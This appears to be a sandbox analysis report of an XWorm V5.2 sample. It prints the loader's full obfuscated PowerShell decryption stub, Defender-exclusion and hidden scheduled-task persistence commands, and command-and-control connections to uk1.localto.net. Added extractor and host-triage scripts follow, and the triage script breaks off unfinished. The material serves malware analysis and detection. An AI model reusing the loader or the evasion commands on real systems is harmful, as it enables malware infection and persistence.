C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_599_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_599.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_599.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_599.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_599.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 564 -p 5096 -ip 5096

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 5096 -s 1016

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe"

C:\ProgramData\svchost.exe

C:\ProgramData\svchost.exe
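
The two cmd.exe /S /D /c" echo function decrypt_function ... " command lines above are the whole loader: it reads its own .bat, finds the line beginning with the 20-character marker sgymnEOEMpmtiRUpGEhO, splits the remainder on '\', undoes the '#'->'/' and '@'->'A' substitutions, base64-decodes, AES-256-CBC decrypts with the hard-coded key and IV, gunzips, and calls Assembly.Load() plus EntryPoint.Invoke() on each result. Reflection-only method names are hidden by reversing strings ('daoL', 'gnirtS46esaBmorF', 'txeTllAdaeR'). The script below is an added example, not code from the report or from the XWorm authors: it re-implements the same pipeline with the execute step replaced by a write to disk, so the two payloads can be hashed and handed to a .NET decompiler. Key, IV, marker and substitutions are copied from the command line; the output file names, the IsPE check and the constructed sample .bat (used when no -BatPath is given) are assumptions for the example.

```powershell
# Added example: defanged re-implementation of the PowerShell stub carried by
# 'XWorm V5.2.bat' / '$phantom-startup_str_599.bat'. Decrypts and dumps the embedded
# payloads instead of Assembly.Load()-ing them. Tested shape: Windows PowerShell 5.1 / 7.x.
param(
    [string]$BatPath,                               # path to the real .bat; omitted -> constructed sample
    [string]$OutDir = (Join-Path $PWD 'extracted')  # assumed output location
)

$KeyB64 = 'Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='   # from the command line: 32 bytes -> AES-256
$IvB64  = 'yPdScja9U8RjkyeOpTlzgQ=='                       # from the command line: 16-byte IV
$Marker = 'sgymnEOEMpmtiRUpGEhO'                           # line prefix the stub searches for (Substring(20))

function Invoke-AesCbc {
    param([byte[]]$Data, [bool]$Encrypt)
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key = [Convert]::FromBase64String($KeyB64)
    $aes.IV  = [Convert]::FromBase64String($IvB64)
    $xf = if ($Encrypt) { $aes.CreateEncryptor() } else { $aes.CreateDecryptor() }
    # leading comma keeps the byte[] intact instead of unrolling it onto the pipeline
    try { ,$xf.TransformFinalBlock($Data, 0, $Data.Length) }
    finally { $xf.Dispose(); $aes.Dispose() }
}

function Expand-Gzip {
    param([byte[]]$Data)
    $in  = New-Object System.IO.MemoryStream(,$Data)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($in, [IO.Compression.CompressionMode]::Decompress)
    $gz.CopyTo($out); $gz.Dispose(); $in.Dispose()
    ,$out.ToArray()
}

function Compress-Gzip {   # only used to build the constructed sample
    param([byte[]]$Data)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($out, [IO.Compression.CompressionMode]::Compress)
    $gz.Write($Data, 0, $Data.Length); $gz.Dispose()
    ,$out.ToArray()
}

# Same steps as the stub, in the same order, minus execute_function.
function Export-EmbeddedPayloads {
    param([string[]]$Lines, [string]$Dir)
    $blob = $Lines | Where-Object { $_.StartsWith($Marker) } | Select-Object -First 1
    if (-not $blob) { throw 'marker line not found; this .bat may use a different prefix' }
    $i = 0
    foreach ($chunk in $blob.Substring($Marker.Length).Split([char]'\')) {
        $b64   = $chunk.Replace('#', '/').Replace('@', 'A')           # undo the stub's substitutions
        $bytes = Expand-Gzip (Invoke-AesCbc ([Convert]::FromBase64String($b64)) $false)
        $path  = Join-Path $Dir ('payload_{0}.bin' -f $i)
        [IO.File]::WriteAllBytes($path, $bytes)
        $sha = [BitConverter]::ToString([Security.Cryptography.SHA256]::Create().ComputeHash($bytes)).Replace('-', '')
        [pscustomobject]@{
            Index  = $i
            Bytes  = $bytes.Length
            IsPE   = ($bytes.Length -gt 1 -and $bytes[0] -eq 0x4D -and $bytes[1] -eq 0x5A)  # 'MZ' header expected for the real payloads
            SHA256 = $sha
            Path   = $path
        }
        $i++
    }
}

# Constructed sample (NOT the real .bat): two short strings wrapped exactly as the stub expects,
# so the script runs offline. With a real sample, pass -BatPath instead.
function New-SampleBatLines {
    $parts = foreach ($txt in 'payload-one', 'payload-two') {
        $enc = Invoke-AesCbc (Compress-Gzip ([Text.Encoding]::UTF8.GetBytes($txt))) $true
        [Convert]::ToBase64String($enc).Replace('/', '#').Replace('A', '@')
    }
    @('@echo off', 'rem decoy batch lines precede the marker in the real file', ($Marker + ($parts -join '\')))
}

$lines = if ($BatPath) { [IO.File]::ReadAllLines($BatPath) } else { New-SampleBatLines }
New-Item -ItemType Directory -Force -Path $OutDir | Out-Null
Export-EmbeddedPayloads -Lines $lines -Dir $OutDir | Format-Table -AutoSize
```

Run it as `.\Extract-XwormBat.ps1 -BatPath 'C:\path\to\XWorm V5.2.bat'` on a copy of the dropped batch file. Because the key and IV are fixed in the stub, the same script recovers both payloads from the Roaming copy ($phantom-startup_str_599.bat); for real samples both outputs should report IsPE = True (.NET assemblies that the stub would have loaded via Assembly.Load), and the SHA256 values are what you pivot on, not the hash of the .bat wrapper, which changes with every re-encryption.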

Network

Country Destination Domain Proto
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 73.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 uk1.localto.net udp
DE 80.190.85.84:3725 uk1.localto.net tcp
US 8.8.8.8:53 84.85.190.80.in-addr.arpa udp
DE 80.190.85.84:3725 uk1.localto.net tcp

Files

memory/3584-0-0x00007FFCD2ED3000-0x00007FFCD2ED5000-memory.dmp

memory/3584-1-0x0000000000CB0000-0x0000000001EF2000-memory.dmp

memory/3584-2-0x00007FFCD2ED0000-0x00007FFCD3991000-memory.dmp

memory/1924-3-0x00007FFCD2ED0000-0x00007FFCD3991000-memory.dmp

memory/4360-4-0x00007FFCD2ED0000-0x00007FFCD3991000-memory.dmp

memory/4360-5-0x00007FFCD2ED0000-0x00007FFCD3991000-memory.dmp

memory/4360-6-0x00007FFCD2ED0000-0x00007FFCD3991000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_agcd0qbi.piw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4360-7-0x00000166718A0000-0x00000166718C2000-memory.dmp

memory/4360-19-0x00007FFCD2ED0000-0x00007FFCD3991000-memory.dmp

memory/1924-21-0x00007FFCD2ED0000-0x00007FFCD3991000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XWorm V5.2.exe.log

MD5 84cfdb4b995b1dbf543b26b86c863adc
SHA1 d2f47764908bf30036cf8248b9ff5541e2711fa2
SHA256 d8988d672d6915b46946b28c06ad8066c50041f6152a91d37ffa5cf129cc146b
SHA512 485f0ed45e13f00a93762cbf15b4b8f996553baa021152fae5aba051e3736bcd3ca8f4328f0e6d9e3e1f910c96c4a9ae055331123ee08e3c2ce3a99ac2e177ce

memory/3584-27-0x00007FFCD2ED0000-0x00007FFCD3991000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat

MD5 1a270a2d79f958a83af1ab2b5805e43c
SHA1 aeb2f51a0d1377a25fdcd614fc96fe6b3afbbeeb
SHA256 5a0ee0516cf26c772261c81a9cbc45fa625268576debb7d8b38609687554544c
SHA512 00bec3f89f9f27236adf0167d6382b60a2be56bdb6b00aae0117396e30e77a993b97d2b7f2af3ae96b81bce0b55bf177d4c4d0c272df05d72c2dc55577b14191

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/2412-39-0x000001CB4A640000-0x000001CB4A684000-memory.dmp

memory/2412-40-0x000001CB4A710000-0x000001CB4A786000-memory.dmp

memory/2412-41-0x000001CB31170000-0x000001CB31178000-memory.dmp

memory/2412-42-0x000001CB4ADB0000-0x000001CB4BA2E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2979eabc783eaca50de7be23dd4eafcf
SHA1 d709ce5f3a06b7958a67e20870bfd95b83cad2ea
SHA256 006cca90e78fbb571532a83082ac6712721a34ea4b21f490058ffb3f521f4903
SHA512 92bc433990572d9427d0c93eef9bd1cc23fa00ed60dd0c9c983d87d3421e02ce3f156c6f88fe916ef6782dbf185cbce083bc0094f8c527f302be6a37d1c53aba

C:\Users\Admin\AppData\Roaming\$phantom-startup_str_599.vbs

MD5 01ab4014ff9173b34107937c8bbd34fd
SHA1 72d0f80f0b52cafac865ae3537b94071afc09b9e
SHA256 a9357bb43016080e42f219a84ccc411e8b4b236f136f8cd90ee1f25db6275ef6
SHA512 a6407427f144f93675fce74ee77fe42e9490252ec7fb50fcba7c95f8d4734de4173dde96460d9ce0ee286fc62546c191b5ffc33e375540ee3ab77173c99c5ca3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 005bc2ef5a9d890fb2297be6a36f01c2
SHA1 0c52adee1316c54b0bfdc510c0963196e7ebb430
SHA256 342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
SHA512 f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

memory/3452-71-0x0000000007F80000-0x0000000007FAA000-memory.dmp

memory/3452-120-0x00007FFCB1390000-0x00007FFCB13A0000-memory.dmp

memory/1616-122-0x00007FFCB1390000-0x00007FFCB13A0000-memory.dmp

memory/1120-125-0x00007FFCB1390000-0x00007FFCB13A0000-memory.dmp

memory/2952-124-0x00007FFCB1390000-0x00007FFCB13A0000-memory.dmp

memory/3348-121-0x00007FFCB1390000-0x00007FFCB13A0000-memory.dmp

memory/1556-129-0x00007FFCB1390000-0x00007FFCB13A0000-memory.dmp

memory/1384-128-0x00007FFCB1390000-0x00007FFCB13A0000-memory.dmp

memory/2436-127-0x00007FFCB1390000-0x00007FFCB13A0000-memory.dmp

memory/4420-126-0x00007FFCB1390000-0x00007FFCB13A0000-memory.dmp

memory/1708-133-0x00007FFCB1390000-0x00007FFCB13A0000-memory.dmp

memory/2556-131-0x00007FFCB1390000-0x00007FFCB13A0000-memory.dmp

memory/2928-123-0x00007FFCB1390000-0x00007FFCB13A0000-memory.dmp

memory/4564-130-0x00007FFCB1390000-0x00007FFCB13A0000-memory.dmp

memory/1260-134-0x00007FFCB1390000-0x00007FFCB13A0000-memory.dmp

memory/2512-132-0x00007FFCB1390000-0x00007FFCB13A0000-memory.dmp

memory/1512-171-0x000002A110410000-0x000002A110426000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe

MD5 8b7b015c1ea809f5c6ade7269bdc5610
SHA1 c67d5d83ca18731d17f79529cfdb3d3dcad36b96
SHA256 7fc9c7002b65bc1b33f72e019ed1e82008cc7b8e5b8eaf73fc41a3e6a246980e
SHA512 e652913f73326f9d8461ac2a631e1e413719df28c7938b38949c005fda501d9e159554c3e17a0d5826d279bb81efdef394f7fb6ff7289cf296c19e92fd924180

memory/5096-182-0x000001B752D50000-0x000001B753988000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TMzpx\TMzpx.dll

MD5 2f1a50031dcf5c87d92e8b2491fdcea6
SHA1 71e2aaa2d1bb7dbe32a00e1d01d744830ecce08f
SHA256 47578a37901c82f66e4dba47acd5c3cab6d09c9911d16f5ad0413275342147ed
SHA512 1c66dbe1320c1a84023bdf77686a2a7ab79a3e86ba5a4ea2cda9a37f8a916137d5cfec30b28ceae181355f6f279270465ef63ae90b7e8dcd4c1a8198a7fd36a8

memory/5096-190-0x000001B76EDB0000-0x000001B76F99C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bceed48e720d53a41dfa3c7c73f23f0f
SHA1 d06284e9e184a924efb235e8abc8ec19348b8c2d
SHA256 2a94a7e6d5247e4f03a36f6c9cd1e24c394bdbcdf46b9a866ad7823d0483d019
SHA512 402a0006b17a603c3a8c6ebc566579d1fe1a27e5d834ebe3cb1420d09d829ef261de2b4e62b6fce3624e93fe42dbfa21d4bb7063469c480ae4d9c5568d5df31f

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 96e3b86880fedd5afc001d108732a3e5
SHA1 8fc17b39d744a9590a6d5897012da5e6757439a3
SHA256 c3077e4cadb4ed246c02abe55aa6cf832fee4c2546b7addb7d22cd1c7c8c1294
SHA512 909b1968f7204fa7029109b02232d8cc5438f6b4dc7c9044e4e47c59fcee538199b13029e36592b12ed573d48a308dd4822d2ced4129ab08d4111897e02be55d

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3db1c0d23daacf01eb99125ccc2787d3
SHA1 0849528de1ba411279231d635d8f39d54cc829d2
SHA256 bceb96f5c3d31447980eb8cd891bba75b3e5b6eb60abf4d829fc13cd8faf2582
SHA512 3d84635a3395bca1d91ce182ccfb9e38c8da87ad678704673a72d580e4251cedc5a6b2a89040a172a5687b67952e74a13673bd115bce7bdabaed06f89323de5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 a26df49623eff12a70a93f649776dab7
SHA1 efb53bd0df3ac34bd119adf8788127ad57e53803
SHA256 4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512 e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

C:\ProgramData\svchost.exe

MD5 04029e121a0cfa5991749937dd22a1d9
SHA1 f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

memory/1512-262-0x000002A110430000-0x000002A11043C000-memory.dmp
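
The persistence and defence-evasion chain in the Processes and Files sections is simple to check for on a live host: a scheduled task named svchost that runs C:\ProgramData\svchost.exe every minute (schtasks /sc minute /mo 1 /RL HIGHEST), a logon task '$phantom-RuntimeBroker_startup_599_str' pointing at a .vbs in %APPDATA%, Defender exclusions added with Add-MpPreference for powershell.exe, svchost.exe, C:\ProgramData\svchost.exe and the dropped .bat, plus the Run-key and Startup-folder signatures from the summary. The script below is an added triage example, not part of the report: it reads scheduled tasks, Defender preferences, Run keys, the Startup folder and the report's file paths, and flags anything that executes from a user-writable location or excludes a script host. The path patterns, the list of "suspicious" exclusion process names and the PT1M repetition check are assumptions derived from this sample; it makes no changes to the host and needs an elevated prompt for Get-MpPreference and HKLM.

```powershell
# Added example: read-only host triage for the artifacts this XWorm sample leaves behind.
# Run from an elevated Windows PowerShell prompt on the suspect machine.
$UserWritable = '^(C:\\ProgramData\\|C:\\Users\\[^\\]+\\AppData\\|C:\\Users\\Public\\)'   # assumed "bad home" pattern
$ScriptHosts  = 'powershell.exe', 'svchost.exe', 'cmd.exe', 'wscript.exe', 'cscript.exe'  # exclusions worth flagging (assumed)
$findings     = New-Object System.Collections.Generic.List[object]

function Add-Finding([string]$Type, [string]$Name, [string]$Detail) {
    $findings.Add([pscustomobject]@{ Type = $Type; Name = $Name; Detail = $Detail })
}

# 1. Scheduled tasks: action in ProgramData/AppData, a Windows binary name outside System32,
#    or a one-minute repetition (what 'schtasks /sc minute /mo 1' creates: ISO 8601 'PT1M').
foreach ($t in Get-ScheduledTask | Where-Object State -ne 'Disabled') {
    $full = "$($t.TaskPath)$($t.TaskName)"
    foreach ($a in $t.Actions) {
        $exe    = "$($a.Execute)".Trim('"')          # COM-handler actions have no Execute; becomes ''
        $target = ("$exe $($a.Arguments)").Trim()
        if ($target -match $UserWritable) { Add-Finding 'ScheduledTask' $full "runs from user-writable path: $target" }
        if ([IO.Path]::GetFileName($exe) -ieq 'svchost.exe' -and $exe -notmatch '^C:\\Windows\\System32\\svchost\.exe$') {
            Add-Finding 'ScheduledTask' $full "svchost.exe masquerade: $exe"
        }
    }
    $intervals = @($t.Triggers | ForEach-Object { $_.Repetition.Interval })
    if ($intervals -contains 'PT1M') { Add-Finding 'ScheduledTask' $full 'repeats every minute (PT1M)' }
}

# 2. Defender exclusions added with Add-MpPreference.
$mp = Get-MpPreference
foreach ($p in @($mp.ExclusionPath | Where-Object { $_ })) {
    if ($p -match $UserWritable -or $p -match 'powershell|\.bat$|\.vbs$') { Add-Finding 'DefenderExclusionPath' $p 'path exclusion covering a dropper location or script host' }
}
foreach ($p in @($mp.ExclusionProcess | Where-Object { $_ })) {
    if ($ScriptHosts -contains ([IO.Path]::GetFileName($p))) { Add-Finding 'DefenderExclusionProcess' $p 'process exclusion for an interpreter or system binary name' }
}

# 3. Run keys and the Startup folder ("Adds Run key", "Drops startup file").
foreach ($hive in 'HKCU', 'HKLM') {
    $key = "${hive}:\Software\Microsoft\Windows\CurrentVersion\Run"
    if (-not (Test-Path $key)) { continue }
    $props = Get-ItemProperty -Path $key
    foreach ($name in ($props.PSObject.Properties.Name | Where-Object { $_ -notmatch '^PS' })) {
        $val = [string]$props.$name
        if ($val -match $UserWritable -or $val -match '\.vbs|\.bat|wscript|powershell') { Add-Finding 'RunKey' "$hive\...\Run\$name" $val }
    }
}
$startup = [Environment]::GetFolderPath('Startup')
Get-ChildItem -LiteralPath $startup -File -ErrorAction SilentlyContinue |
    Where-Object { $_.Extension -in '.vbs', '.bat', '.exe', '.ps1', '.js' } |
    ForEach-Object { Add-Finding 'StartupFolder' $_.Name $_.FullName }

# 4. Exact paths named in this report (cheap, high-confidence IOCs).
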